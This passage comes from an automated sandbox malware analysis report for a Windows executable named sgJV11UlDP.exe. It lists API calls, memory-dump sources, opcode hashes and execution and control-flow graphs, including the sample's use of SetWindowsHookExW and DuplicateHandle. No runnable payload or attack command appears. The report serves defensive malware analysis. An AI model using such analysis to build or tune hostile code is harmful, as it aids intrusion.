                                                                      • CharNextA.USER32(00000000), ref: 00405A45
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nso1F91.tmp, xrefs: 00405A1F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso1F91.tmp
                                                                      • API String ID: 3213498283-4015771626
                                                                      • Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                      • Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
                                                                      • Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                      • Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402F3E,?), ref: 00402D73
                                                                      • GetTickCount.KERNEL32 ref: 00402D91
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                      • Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
                                                                      • Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                      • Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004050B7
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00405108
                                                                        • Part of subcall function 004040C7: SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 004040D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                      • Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
                                                                      • Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                      • Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,0040374D,00403567,?,?,00000006,00000008,0000000A), ref: 0040378F
                                                                      • GlobalFree.KERNEL32(008F91E0), ref: 00403796
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403775
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-4083868402
                                                                      • Opcode ID: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
                                                                      • Instruction ID: 7399a24566e835d4bf74ae8faf6f599a32d3c581d2ea115a227339331e7fa0df
                                                                      • Opcode Fuzzy Hash: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
                                                                      • Instruction Fuzzy Hash: 1BE0C273401120ABC6216F15ED0871A777C6F46B27F02C12BF8407B26087781C434FC8
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\sgJV11UlDP.exe,C:\Users\user\Desktop\sgJV11UlDP.exe,80000000,00000003), ref: 004059D2
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\sgJV11UlDP.exe,C:\Users\user\Desktop\sgJV11UlDP.exe,80000000,00000003), ref: 004059E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1876063424
                                                                      • Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                      • Instruction ID: cdf7710bfdc0c04f3d6b4f220b8e9fd9f04d7b2eba678cf51078301a7514d20a
                                                                      • Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                      • Instruction Fuzzy Hash: 5AD0C7E2409D705EF30372549D05B9F6A48DF17715F1A0467E181A61A1C67C4D4247BD
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 7002115B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 700211B4
                                                                      • GlobalFree.KERNEL32(?), ref: 700211C7
                                                                      • GlobalFree.KERNEL32(?), ref: 700211F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 60e6aa623e6564e28d78b47401a37a4add2a367702222da90ebc2d3145c327bf
                                                                      • Instruction ID: 3557778345d52d73402946f3e350ec16555b41a839846964f5877b8059552f1a
                                                                      • Opcode Fuzzy Hash: 60e6aa623e6564e28d78b47401a37a4add2a367702222da90ebc2d3145c327bf
                                                                      • Instruction Fuzzy Hash: 8B31D4B2504140AFE7118F65FD85BAD7FFDEB15A72B340059FA46C2362D7749862CB20
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
                                                                      • CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B24
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                      • Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
                                                                      • Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                      • Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9

                                                                      Execution Graph

                                                                      Execution Coverage:8.2%
                                                                      Dynamic/Decrypted Code Coverage:98%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:150
                                                                      Total number of Limit Nodes:13
                                                                      execution_graph 25372 157120 25373 157166 GetCurrentProcess 25372->25373 25375 1571b8 GetCurrentThread 25373->25375 25378 1571b1 25373->25378 25376 1571f5 GetCurrentProcess 25375->25376 25377 1571ee 25375->25377 25379 15722b 25376->25379 25377->25376 25378->25375 25380 157253 GetCurrentThreadId 25379->25380 25381 157284 25380->25381 25382 157980 25383 1579ae 25382->25383 25386 156f1c 25383->25386 25385 1579ce 25385->25385 25387 156f27 25386->25387 25388 15854f 25387->25388 25389 1584f4 25387->25389 25394 15a160 25387->25394 25399 15a188 25387->25399 25388->25385 25389->25388 25404 366e7baf 25389->25404 25408 366e7bb8 25389->25408 25395 15a1a9 25394->25395 25396 15a1cd 25395->25396 25412 15a338 25395->25412 25416 15a33a 25395->25416 25396->25389 25400 15a1a9 25399->25400 25401 15a1cd 25400->25401 25402 15a338 2 API calls 25400->25402 25403 15a33a 2 API calls 25400->25403 25401->25389 25402->25401 25403->25401 25406 366e7c1d 25404->25406 25405 366e8080 WaitMessage 25405->25406 25406->25405 25407 366e7c6a 25406->25407 25407->25388 25410 366e7c1d 25408->25410 25409 366e8080 WaitMessage 25409->25410 25410->25409 25411 366e7c6a 25410->25411 25411->25388 25413 15a345 25412->25413 25414 15a37e 25413->25414 25420 158144 25413->25420 25414->25396 25417 15a345 25416->25417 25418 15a37e 25417->25418 25419 158144 2 API calls 25417->25419 25418->25396 25419->25418 25421 15814f 25420->25421 25423 15a3f0 25421->25423 25424 158178 25421->25424 25423->25423 25425 158183 25424->25425 25431 158188 25425->25431 25427 15a45f 25435 366e0229 25427->25435 25440 366e0238 25427->25440 25428 15a499 25428->25423 25433 158193 25431->25433 25432 15b9e0 25432->25427 25433->25432 25434 15a188 2 API calls 25433->25434 25434->25432 25436 366e0238 25435->25436 25437 366e0275 25436->25437 25446 366e184b 25436->25446 25450 366e1850 25436->25450 25437->25428 25442 366e0269 25440->25442 25443 366e0369 25440->25443 25441 366e0275 25441->25428 25442->25441 25444 366e184b 2 API calls 25442->25444 25445 366e1850 2 API calls 25442->25445 25443->25428 25444->25443 25445->25443 25447 366e187b 25446->25447 25448 366e192a 25447->25448 25454 366e28bb 25447->25454 25451 366e187b 25450->25451 25452 366e192a 25451->25452 25453 366e28bb 2 API calls 25451->25453 25453->25452 25458 366e290f 25454->25458 25462 366e2918 25454->25462 25459 366e2918 CreateWindowExW 25458->25459 25461 366e2a3c 25459->25461 25461->25461 25463 366e2980 CreateWindowExW 25462->25463 25465 366e2a3c 25463->25465 25465->25465 25466 ad0fc 25467 ad114 25466->25467 25468 ad16e 25467->25468 25474 366e2ac0 25467->25474 25480 366e3c33 25467->25480 25489 366e3c38 25467->25489 25498 366e3b4f 25467->25498 25508 366e2ad0 25467->25508 25475 366e2ad0 25474->25475 25477 366e3b4f CallWindowProcW 25475->25477 25478 366e3c38 CallWindowProcW 25475->25478 25479 366e3c33 CallWindowProcW 25475->25479 25476 366e2b17 25476->25468 25477->25476 25478->25476 25479->25476 25481 366e3c65 25480->25481 25482 366e3c99 25481->25482 25484 366e3c89 25481->25484 25530 366e3844 25482->25530 25514 366e3dc0 25484->25514 25519 366e3dbb 25484->25519 25524 366e3e8c 25484->25524 25485 366e3c97 25485->25485 25492 366e3c65 25489->25492 25490 366e3c99 25491 366e3844 CallWindowProcW 25490->25491 25494 366e3c97 25491->25494 25492->25490 25493 366e3c89 25492->25493 25495 366e3e8c CallWindowProcW 25493->25495 25496 366e3dbb CallWindowProcW 25493->25496 25497 366e3dc0 CallWindowProcW 25493->25497 25494->25494 25495->25494 25496->25494 25497->25494 25502 366e3b8f 25498->25502 25499 366e3bff 25500 366e3c99 25501 366e3844 CallWindowProcW 25500->25501 25504 366e3c97 25501->25504 25502->25499 25502->25500 25503 366e3c89 25502->25503 25505 366e3e8c CallWindowProcW 25503->25505 25506 366e3dbb CallWindowProcW 25503->25506 25507 366e3dc0 CallWindowProcW 25503->25507 25504->25504 25505->25504 25506->25504 25507->25504 25509 366e2af6 25508->25509 25511 366e3b4f CallWindowProcW 25509->25511 25512 366e3c38 CallWindowProcW 25509->25512 25513 366e3c33 CallWindowProcW 25509->25513 25510 366e2b17 25510->25468 25511->25510 25512->25510 25513->25510 25516 366e3dd4 25514->25516 25515 366e3e60 25515->25485 25534 366e3e78 25516->25534 25537 366e3e73 25516->25537 25521 366e3dd4 25519->25521 25520 366e3e60 25520->25485 25522 366e3e78 CallWindowProcW 25521->25522 25523 366e3e73 CallWindowProcW 25521->25523 25522->25520 25523->25520 25525 366e3e4a 25524->25525 25526 366e3e9a 25524->25526 25528 366e3e78 CallWindowProcW 25525->25528 25529 366e3e73 CallWindowProcW 25525->25529 25527 366e3e60 25527->25485 25528->25527 25529->25527 25531 366e384f 25530->25531 25532 366e50fa CallWindowProcW 25531->25532 25533 366e50a9 25531->25533 25532->25533 25533->25485 25535 366e3e89 25534->25535 25541 366e503b 25534->25541 25535->25515 25538 366e3e78 25537->25538 25539 366e503b CallWindowProcW 25538->25539 25540 366e3e89 25538->25540 25539->25540 25540->25515 25542 366e3844 CallWindowProcW 25541->25542 25543 366e504a 25542->25543 25543->25535 25544 152268 25546 1522ac SetWindowsHookExW 25544->25546 25547 1522f2 25546->25547 25548 157368 25549 1573d8 DuplicateHandle 25548->25549 25550 1573fe 25549->25550 25551 15e588 25552 15e5b0 25551->25552 25553 15e5a9 25551->25553 25552->25553 25554 366e0238 2 API calls 25552->25554 25555 366e0229 2 API calls 25552->25555 25554->25553 25555->25553

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 73 366e7bb8-366e7c1b 74 366e7c1d-366e7c47 73->74 75 366e7c4a-366e7c68 73->75 74->75 80 366e7c6a-366e7c6c 75->80 81 366e7c71-366e7ca8 75->81 82 366e812a-366e813f 80->82 85 366e7cae-366e7cc2 81->85 86 366e80d9 81->86 87 366e7cc4-366e7cee 85->87 88 366e7cf1-366e7d10 85->88 89 366e80de-366e80f4 86->89 87->88 95 366e7d28-366e7d2a 88->95 96 366e7d12-366e7d18 88->96 89->82 100 366e7d2c-366e7d44 95->100 101 366e7d49-366e7d52 95->101 98 366e7d1c-366e7d1e 96->98 99 366e7d1a 96->99 98->95 99->95 100->89 102 366e7d5a-366e7d61 101->102 103 366e7d6b-366e7d72 102->103 104 366e7d63-366e7d69 102->104 106 366e7d7c 103->106 107 366e7d74-366e7d7a 103->107 105 366e7d7f-366e7d95 call 366e77a4 104->105 109 366e7d9a-366e7d9c 105->109 106->105 107->105 110 366e7da2-366e7da9 109->110 111 366e7ef1-366e7ef5 109->111 110->86 112 366e7daf-366e7dec 110->112 113 366e7efb-366e7eff 111->113 114 366e80c4-366e80d7 111->114 122 366e80ba-366e80be 112->122 123 366e7df2-366e7df7 112->123 115 366e7f19-366e7f22 113->115 116 366e7f01-366e7f14 113->116 114->89 117 366e7f24-366e7f4e 115->117 118 366e7f51-366e7f58 115->118 116->89 117->118 120 366e7f5e-366e7f65 118->120 121 366e7ff7-366e800c 118->121 125 366e7f67-366e7f91 120->125 126 366e7f94-366e7fb6 120->126 121->122 135 366e8012-366e8014 121->135 122->102 122->114 127 366e7e29-366e7e3e call 366e77c8 123->127 128 366e7df9-366e7e07 call 366e77b0 123->128 125->126 126->121 163 366e7fb8-366e7fc2 126->163 133 366e7e43-366e7e47 127->133 128->127 142 366e7e09-366e7e27 call 366e77bc 128->142 138 366e7eb8-366e7ec5 133->138 139 366e7e49-366e7e5b call 366e77d4 133->139 140 366e8016-366e804f 135->140 141 366e8061-366e807e call 366e77a4 135->141 138->122 155 366e7ecb-366e7ed5 call 366e77e4 138->155 166 366e7e5d-366e7e8d 139->166 167 366e7e9b-366e7eb3 139->167 158 366e8058-366e805f 140->158 159 366e8051-366e8057 140->159 141->122 154 366e8080-366e80ac WaitMessage 141->154 142->133 160 366e80ae 154->160 161 366e80b3 154->161 169 366e7ed7-366e7edf call 366e77f0 155->169 170 366e7ee4-366e7eec call 366e77fc 155->170 158->122 159->158 160->161 161->122 174 366e7fda-366e7ff5 163->174 175 366e7fc4-366e7fca 163->175 181 366e7e8f 166->181 182 366e7e94 166->182 167->89 169->122 170->122 174->121 174->163 179 366e7fce-366e7fd0 175->179 180 366e7fcc 175->180 179->174 180->174 181->182 182->167
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4105835176.00000000366E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_366e0000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bf3ab12300ad1bf444f47f0ed78051025a7ea9ad7e20e5eda48c6ba69fe1bc5
                                                                      • Instruction ID: e1d839d0ca61e1d27b402b25da5fdf943d8e4982e00e823556d6a66e5a8e4c52
                                                                      • Opcode Fuzzy Hash: 4bf3ab12300ad1bf444f47f0ed78051025a7ea9ad7e20e5eda48c6ba69fe1bc5
                                                                      • Instruction Fuzzy Hash: F9F16B34E01309CFEB14DFA9CA48B9DBBF1FF88344F118158E805AB2A5DB74A945CB91

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0015719E
                                                                      • GetCurrentThread.KERNEL32 ref: 001571DB
                                                                      • GetCurrentProcess.KERNEL32 ref: 00157218
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00157271
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075427376.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 88fd89540c48f3b670dfb88e43cdc8f127b723fee1087e2f423410ce63044661
                                                                      • Instruction ID: 6566d0530ecd59a9231ecf9ea21c9b74e262146aa3702fdf1fc85e2389107f43
                                                                      • Opcode Fuzzy Hash: 88fd89540c48f3b670dfb88e43cdc8f127b723fee1087e2f423410ce63044661
                                                                      • Instruction Fuzzy Hash: 79517AB0900349CFEB14DFA9D548BAEBBF1BF88311F208069E418A72A1D7745945CF61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0015719E
                                                                      • GetCurrentThread.KERNEL32 ref: 001571DB
                                                                      • GetCurrentProcess.KERNEL32 ref: 00157218
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00157271
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075427376.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: d54a4585f7bb5406ec992da6a7b8005215459337dc7d7ba29f84e425721022e8
                                                                      • Instruction ID: 6e96cb25e57acf63f42624a14f08783f03e8ab1b1ccbc858bf0f31bac2f7dd08
                                                                      • Opcode Fuzzy Hash: d54a4585f7bb5406ec992da6a7b8005215459337dc7d7ba29f84e425721022e8
                                                                      • Instruction Fuzzy Hash: 465168B0900309CFEB14DFA9D548BAEBBF1AF88311F208429E819A7390DB755945CF65

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 185 366e290f-366e297e 187 366e2989-366e2990 185->187 188 366e2980-366e2986 185->188 189 366e299b-366e2a3a CreateWindowExW 187->189 190 366e2992-366e2998 187->190 188->187 192 366e2a3c-366e2a42 189->192 193 366e2a43-366e2a7b 189->193 190->189 192->193 197 366e2a7d-366e2a80 193->197 198 366e2a88 193->198 197->198 199 366e2a89 198->199 199->199
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 366E2A2A
                                                                      Memory Dump Source
